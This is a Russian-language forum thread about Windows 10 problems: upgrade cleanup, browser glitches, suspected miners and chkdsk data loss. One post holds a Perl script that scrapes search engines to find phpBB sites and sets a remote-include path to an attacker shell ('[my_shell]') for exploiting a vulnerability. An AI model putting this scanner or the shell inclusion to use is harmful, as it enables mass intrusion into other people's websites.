HOPPING_PONY Опубликовано: 16 мая 2018 Опубликовано: 16 мая 2018 1 час назад, =FA=CATFISH сказал: Disk Cleanup не помог. Очистил всякую мелочь. Опции Windows Update Cleanup вообще не наблюдалось. Там нужно кнопочку нажать, иначе оно с правами юзера запускается: 1
Aurelius Опубликовано: 16 мая 2018 Опубликовано: 16 мая 2018 Еще раз всем спасибо, почистил. А папку Windows Old просто перекинул на диск "D". У меня там 2 ТБ, лишние 30 Гб (а именно столько и набралось) остались незамеченными.
glassded Опубликовано: 16 мая 2018 Опубликовано: 16 мая 2018 4 минуты назад, Aurelius сказал: Еще раз всем спасибо, почистил. А папку Windows Old просто перекинул на диск "D". У меня там 2 ТБ, лишние 30 Гб (а именно столько и набралось) остались незамеченными. А нафига она тебе вообще?
Aurelius Опубликовано: 16 мая 2018 Опубликовано: 16 мая 2018 4 минуты назад, glassded сказал: А нафига она тебе вообще? Дэк, на всякий крайний. Пусть полежит 2-3 недели, а потом удалю.
Narval Опубликовано: 16 мая 2018 Опубликовано: 16 мая 2018 (изменено) Виндовс10 сама удалит виндовс олд, а не дочитал, извеняюсь. Если на д то сама не удалит))) Изменено 16 мая 2018 пользователем Narval
=FA=CATFISH Опубликовано: 16 мая 2018 Опубликовано: 16 мая 2018 6 минут назад, Narval сказал: Виндовс10 сама удалит виндовс олд, а не дочитал, извеняюсь. Если на д то сама не удалит))) сдается мне что независимо от буквы диска WIN10 ничего не удалит. Иначе зачем ей вообще оставлять что-то
Narval Опубликовано: 16 мая 2018 Опубликовано: 16 мая 2018 А вообще 10-ку, я выдержал ниделю. Мало того что трекир запускался нормально с 5-го раза, дак в добавок отпадали переодически юсб устройства, и это при том что новое железо с последним поколением процессор 11 минут назад, =FA=CATFISH сказал: сдается мне что независимо от буквы диска WIN10 ничего не удалит. Иначе зачем ей вообще оставлять что-то https://support.microsoft.com/ru-ru/help/4028075/windows-delete-your-previous-version-of-windows
=FA=CATFISH Опубликовано: 16 мая 2018 Опубликовано: 16 мая 2018 1 час назад, Narval сказал: https://support.microsoft.com/ru-ru/help/4028075/windows-delete-your-previous-version-of-windows будем посмотреть
=IronSky=KuRok Опубликовано: 17 мая 2018 Опубликовано: 17 мая 2018 В 16.05.2018 в 11:50, =IronSky=KuRok сказал: У меня после этого обновления начались похожие проблемы как у этого товарища. В общем, откат 1803 назад решил проблему. Были рывки при обзоре опентреком в сетевой игре. 1
Gargoyle Опубликовано: 23 января 2019 Опубликовано: 23 января 2019 Обновил нэтбук старенький на ХР до 10ки - заработал АКБ... 2
Dy6ACuM Опубликовано: 23 апреля 2019 Опубликовано: 23 апреля 2019 Поставил десятку. При запущенном хроме, периодически в секунд 10 в среднем, моргает и тут же пропадает кружок загрузки возле стрелки мыши. Напрягает, зараза, я уже и не знаю чего отключить и где глянуть, всё что мог отключить, отключал. Никто не сталкивался? Может так и должен быть? Листаешь страницу, она подгружается, но бывает что и не листаешь, а всё равно кружок моргнёт. В семёрке ничего такого нет.
DenUA Опубликовано: 23 апреля 2019 Опубликовано: 23 апреля 2019 нету ничего подобного! у меня на 10-ке намного шустрее комп и проги пошли... В играх ФПС веселее процентов на 20... А вот с хромом смотри - какие расширения стоят и по каким сайтам ходишь! Майнеры сейчас далеко не редкость! Я например, иногда на автомобильный форум захожу. Нагрузка проца и видяхи взлетает до 100%. Пришлось на нем вручную отрубать все cooke файлы и рекламы... А если у вас и винда с какой-либо сборки, то надеяться что чистая - не стоит... 1
He6o Опубликовано: 23 апреля 2019 Опубликовано: 23 апреля 2019 К 10 мая запланировано большое обновление Win10. Для обычного пользователя добавлены расширения безопасности сёрфинга в браузере от атак.
StorkNet Опубликовано: 23 апреля 2019 Опубликовано: 23 апреля 2019 23 минуты назад, He6o сказал: К 10 мая Инсайдерская информация? : )
He6o Опубликовано: 23 апреля 2019 Опубликовано: 23 апреля 2019 Да еще тестирую пакеты дополнения. До 3 мая отчеты желательно сдать. Новое меню пуск с расширенным функционалом, мне не "зашло" не понравилось. А самое интересное у меня один из ноутов для Великобритании выпущен. И я первый получаю официальные обновы потом на остальные компы приходит.
Dy6ACuM Опубликовано: 23 апреля 2019 Опубликовано: 23 апреля 2019 Отключал все куки и расширения и прочее типа "помогать улучшить поиск", все равно то и дело мелькает кружок
Dy6ACuM Опубликовано: 24 апреля 2019 Опубликовано: 24 апреля 2019 (изменено) Вот же ж хром. В опере такой фигни нету. А вот ещё прикол Изменено 24 апреля 2019 пользователем Dy6ACuM
He6o Опубликовано: 24 апреля 2019 Опубликовано: 24 апреля 2019 Круто! Это получается google chrome разогнал Ваш процессор? Выставляйте его на eBay за 1000$ и скрин температур добавте
DenUA Опубликовано: 24 апреля 2019 Опубликовано: 24 апреля 2019 8 часов назад, Dy6ACuM сказал: Вот же ж хром. В опере такой фигни нету. А вот ещё прикол А мне не нравится синхронное повышение трафика с загрузкой. Явный майнер сидит...
He6o Опубликовано: 24 апреля 2019 Опубликовано: 24 апреля 2019 Вы имеете в виду криптоджекинг? Не в России этот финт запрещён. На уровне провайдера можно вычислить частые обращения к доменам популярных крипто майнинговых пулов. Что то пытаются конечно доказать такие компании как Касперский, заставляют покупать новые продукты защиты. Но это не касается домашних компов. А на уровне компаний любой сисадмин, если сам не в теме, может вычислить адреса с которых идут запросы.
Dy6ACuM Опубликовано: 26 апреля 2019 Опубликовано: 26 апреля 2019 Винда с сайта майкрософта, не ломаная. Вычислил, что с хромом эту фигню делает norton security, странно что в семёрке нормально всё.
He6o Опубликовано: 26 апреля 2019 Опубликовано: 26 апреля 2019 Попробуйте для начала поставить по умолчанию сбалансированную систему питания. Перезагрузите комп и в диспетчере посмотрите заново.
Dy6ACuM Опубликовано: 26 апреля 2019 Опубликовано: 26 апреля 2019 Да я не про частоту неправильную писал, а про мелькающий кружок загрузки при запущенном хроме. Видимо эти две проблемы не связаны. Как только ставлю нортона, так сразу начинается. Расширений никаких не установлено. Попробую в тп нортона обратиться. А пляски с частотой известная проблема, как оказалось, решается добавлением счетчиков в perfmon.exe, но у меня почему-то там пусто, на сайте Микрософт есть ссылка на инструкцию.
Dy6ACuM Опубликовано: 26 апреля 2019 Опубликовано: 26 апреля 2019 4 часа назад, 2BAG_Miron сказал: Нортон? Рили? )) Мне нравится. А что плохого? Тем более за него плачу не я.
He6o Опубликовано: 3 мая 2019 Опубликовано: 3 мая 2019 Мне как тестеру продуктов компании Microsoft пришло письмо 1 мая с очередным конкурсом. <<Это профессиональный конкурс, открытый только для лиц, активно участвующих в бета-программе Windows Insider Program с действительным бета-идентификатором>> бесплатная поездка в штаты с проживанием четыре дня. Я "загорелся", моё направление - безопасный сёрфинг в сети. Получаю задание - <<Бот сети, поиск информации, регламентная информация>> Вчера вечером сижу за компом, вспоминаю старые наработки: Скрытый текст #!/usr/bin/perl use strict; use warnings; use LWP::UserAgent; our $h0pz = 20; # число скачков по результатам поисковика our $banner = 'kblance'; # собственно цель поиска our $mask = 'BB/'; # маска установочного пути, т.е. http://bla.ru/phpBB/index.php, если ПО установлено сразу в корень, # http://bla.ru/index.php, значение переменной оставляем пустым our $include = 'http://[my_shell]/script'; # это путь к скрипту который мы хотим подгрузить, используя уязвимость our $accord = 'vse_*aebis'; # возвращаемый ответ соответствия our @c0ntent = (); # в эту переменную будет в последующем заноситься результаты поиска our @uRLS = (); # здесь буду уже будут содержаться исключительно URLы # опишем подпрограмму поиска используя aol.com sub aolCom { print "[:: aol.com ::]\n"; for(my $i = 1; $i <= $h0pz/10; $i++) # скачем по страницам результатов { my $ua = LWP::UserAgent->new; # указываем UserAgent браузера $ua->agent("Googlebot/2.1 (+http://www.google.com/bot.html)" . $ua->agent); # Составляем запрос поисковику с переменными $banner и $i my $req = HTTP::Request->new(GET => "http://search.aol.com/aolcom/search?invocationType=topsearchbox.search&query=$banner&page=$i"); $req->header('Accept' => 'text/html'); # отправляем запрос my $res = $ua->request($req); # добавляем в массив @c0ntent общий результат поиска push @c0ntent, $res->content; } # выдираем из общего результата толька URL-ы foreach(@c0ntent){push @uRLS, $_ =~ m{<b id="[^"]*">(.+?)</b>}smig;} #" } # опишем подпрограмму поиска используя msn.com sub msnCom { print "[:: msn.com ::]\n"; for(my $i = 1; $i <= $h0pz; $i += 10) # скачем по страницам результатов { my $ua = LWP::UserAgent->new; $ua->agent("Googlebot/2.1 (+http://www.google.com/bot.html)" . $ua->agent); my $req = HTTP::Request->new(GET => "http://search.msn.com/results.aspx?q=$banner&first=$i&FORM="); $req->header('Accept' => 'text/html'); my $res = $ua->request($req); push @c0ntent, $res->content; } foreach(@c0ntent){push @uRLS, $_ =~ /<h3><a.\w+\W{2}(.+?)\W>/g;} #" } # опишем код поиска по яндексу sub yandex { print "[:: yandex.ru ::]\n"; for(my $i = 1; $i <= $h0pz/10; $i++) # скачем по страницам результатов { my $ua = LWP::UserAgent->new; $ua->agent("Googlebot/2.1 (+http://www.google.com/bot.html)" . $ua->agent); my $req = HTTP::Request->new(GET => "http://ya.ru/yandpage?&q=744300646&p=$i&ag=d&qs=rpt%3Drad%26text%3D$banner"); $req->header('Accept' => 'text/html'); my $res = $ua->request($req); push @c0ntent, $res->content; } foreach(@c0ntent){push @uRLS, $_ =~ /\W{3}.href\W{2}(.+?)\W.target/g;} #" } # ну и всеми любимый гуглА sub google { print "[:: google.com ::]\n"; for(my $i = 1; $i <= $h0pz; $i += 10) # скачем по страницам результатов { my $ua = LWP::UserAgent->new; $ua->agent("Googlebot/2.1 (+http://www.google.com/bot.html)" . $ua->agent); my $req = HTTP::Request->new(GET => "http://google.com/search?q=$banner&hl=en&lr=&start=$i&sa=N"); $req->header('Accept' => 'text/html'); my $res = $ua->request($req); push @c0ntent, $res->content; } foreach(@c0ntent){push @uRLS, $_ =~ /<a.\w+\W{2}.\W.\w+\W{2}(.+?)\W>/g;} #" } Мой мелкий восьмиклассник, улыбается в стороне, наблюдает, как я убил час,два времени на код. И выставляет свой шаблон. И даже показывает в действие, за две минуты получает две тысячи ответов от бот-сеть поиска. У меня "вышел пар", я понял моё время ушло ?
BBC Опубликовано: 8 июня 2019 Автор Опубликовано: 8 июня 2019 (изменено) Сказка о "зависшей" в Пуске иконке/плитке. После переустановки Ил-2 иногда меняет название директории. Например, сейчас Great Battles, а было Battles of Moscow. И у меня в меню Пуск зависла одна плиточка с названием W~(дальше название бывшей папки, начиная с буквы диска). И я никак не мог её удалить, вообще никак. Перепробовал наверно абсолютно всё, что советовали в интернетах, баг то старый, ещё с 8-ки тянется. Короче, боясь убить 10-ку, дрожащими руками всё таки залез в "конфигурацию компьютера", а не в "конфигурацию пользователя", как советуют все, кто даёт способы через "редактор локальной групповой политики" (gpedit.msc). И там углядел строку "макет начального экрана", прочитал пару раз что это такое. Изменил, было - не задано, поставил - отключено. Всё, исчезла. Она ж столько времени висела! Может год, может больше. И ничего не помогало, хотя скорее всего сработало что то ещё, а эта настройка могла быть просто шлагбаумом. Вот так виндоус рвёт все шаблоны! P.S. Полный путь забыл указать <<Конфигурация компьютера/административные шаблоны/Меню "Пуск" и панель задач>> Изменено 8 июня 2019 пользователем BBC 2
=FA=CATFISH Опубликовано: 5 июля 2019 Опубликовано: 5 июля 2019 Случилось страшное. Ковырялся в компе тут намедни. Ради "изучения" поставил десятку на новый винт и забыл отключить старый. Через минут 20, десятка выдала "оповещение ", что надо проверить диск. Сдуру нажал проверку. Винда задумалась довольно надолго и ушла в "перезагрузку для обновления" После длительного обновления на 30% почуял неладное и сначала выдернул сетевой шнур, а еще через минуты 2 нажал "ресет" Результат: на старом диске побиты данные. Как раз процентов 30. Хорошо, что ничего невосполнимого.
KOPCAP Опубликовано: 5 июля 2019 Опубликовано: 5 июля 2019 43 минуты назад, =FA=CATFISH сказал: Через минут 20, десятка выдала "оповещение ", что надо проверить диск. Сдуру нажал проверку. 2
=FA=CATFISH Опубликовано: 5 июля 2019 Опубликовано: 5 июля 2019 15 минут назад, KOPCAP сказал: О ясновельможный гуру виды 10 не буди въсуе дменен.
N2O Опубликовано: 5 июля 2019 Опубликовано: 5 июля 2019 2 часа назад, =FA=CATFISH сказал: Случилось страшное. Ох, мля, знакомо. У нас как-то в 2004 так мой приятель здорово почистил сервак компании Ночью на дежурстве решил почистить от мусора свой комп. И в доках углядел папку с незнакомым названием. А то админ, лопух, расшарил сервак делая что-то с его компа и забыл залочить. Смотрит Серега - а папка-то зараза тяжеленная. Он осерчал - мол вот, мудаки, наковыряли говна, засоряют рабочую машину. Ну и давай удалять. Оно конечно спросило - мол много очень - безвозвратно мочить. Он - ДА, канэшна... Минут через 20 он почуял, что ... что-то не то... решил посмотреть, что там в папке такое большое... а там - до боли знакомые названия баз Утром он имел очень смешной вид. Но, слава Богу, как и в твоем случае ниче смертельного. Самое интересное, что админ вообще не пострадал - выкрутился как-то А грохнулось процентов 30 инфы
ABP_158 Опубликовано: 5 июля 2019 Опубликовано: 5 июля 2019 Десятка веселая штука,переустанавливал три раза?Но как та мышь,жру этот кактус.
=FA=CATFISH Опубликовано: 5 июля 2019 Опубликовано: 5 июля 2019 9 минут назад, N2O сказал: Ох, мля, знакомо. У нас как-то в 2004 так мой приятель здорово почистил сервак компании Ночью на дежурстве решил почистить от мусора свой комп. И в доках углядел папку с незнакомым названием. А то админ, лопух, расшарил сервак делая что-то с его компа и забыл залочить. Смотрит Серега - а папка-то зараза тяжеленная. Он осерчал - мол вот, мудаки, наковыряли говна, засоряют рабочую машину. Ну и давай удалять. Оно конечно спросило - мол много очень - безвозвратно мочить. Он - ДА, канэшна... Минут через 20 он почуял, что ... что-то не то... решил посмотреть, что там в папке такое большое... а там - до боли знакомые названия баз Утром он имел очень смешной вид. Но, слава Богу, как и в твоем случае ниче смертельного. Самое интересное, что админ вообще не пострадал - выкрутился как-то А грохнулось процентов 30 инфы Ну нее... все не так. Дело в том, что винда навязала chkdsk, а я повелся.
N2O Опубликовано: 5 июля 2019 Опубликовано: 5 июля 2019 (изменено) Кста... я тут недавно к компу с 10 пытался подключить винт старый на котром хрюша жила. Для того, чтобы форматнуть его. Так 10 вначале задумалась и выдала - мол у нас тут проблема возникла - надо перезагрузиться и... не дожидаясь моего "валяй" самовольно перезагрузилась И винт старый не показывает, хотя там кроме винды еще куча файлов... Типа в упор не вижу вашу хрюшу... пришлось экспериментировать с подключением, перезагружаться... но таки я ее принудил И нормально форматнулся Изменено 5 июля 2019 пользователем N2O
ABP_158 Опубликовано: 5 июля 2019 Опубликовано: 5 июля 2019 Только что, =FA=CATFISH сказал: Дело в том, что винда навязала chkdsk, а я повелся. Оно как всегда вовремя,у меня на загрузке антивирус начал обновляться,и плакала Маруся по красивому платочку.
=FA=CATFISH Опубликовано: 5 июля 2019 Опубликовано: 5 июля 2019 4 минуты назад, N2O сказал: Кста... я тут недавно к компу с 10 пытался подключить винт старый на котром хрюша жила. Для того, чтобы форматнуть его. Так 10 вначале задумалась и выдала - мол у нас тут проблема возникла - надо перезагрузиться и... не дожидаясь моего "валяй" самовольно перезагрузилась И винт старый не показывает, хотя там кроме винды еще куча файлов... Типа в упор не вижу вашу хрюшу... пришлось экспериментировать с подключением, перезагружаться... но таки я ее принудил И нормально форматнулся Во во.. это ближе к моему случаю
N2O Опубликовано: 5 июля 2019 Опубликовано: 5 июля 2019 буду ставить 7 себе и малому - у жены на ноуте уже года 3 живет после убиения висты и все ок И никаких траблов с сетью дома ... а в 10
N2O Опубликовано: 7 августа 2019 Опубликовано: 7 августа 2019 Сижу, ставлю 7 вместо упавшей 10. Постоянно вспоминаю то ближайшую родственницу Билли, то анекдот про танкистов и фею... И понимаю, что я никуя не ремонтник - мое дело с чистого листа куярить. Это сильно напоминает ремонт старого жигуля. Автолюбитель азартно высунув язык ищет проблему, а я исходя матюками пытаюсь понять почему нельзя было сделать по-человечески. Как справлюсь (даст Бог)... отпишусь - там еще предистория веселая была.
DasMaximus Опубликовано: 7 августа 2019 Опубликовано: 7 августа 2019 Откуда у вас столько проблем ? Я Как 10 поставил, уже не помню сколько лет назад, так пользуюсь без каких либо проблем. 5
Рекомендованные сообщения
Создайте аккаунт или войдите в него для комментирования
Вы должны быть пользователем, чтобы оставить комментарий
Создать аккаунт
Зарегистрируйтесь для получения аккаунта. Это просто!
Зарегистрировать аккаунтВойти
Уже зарегистрированы? Войдите здесь.
Войти сейчас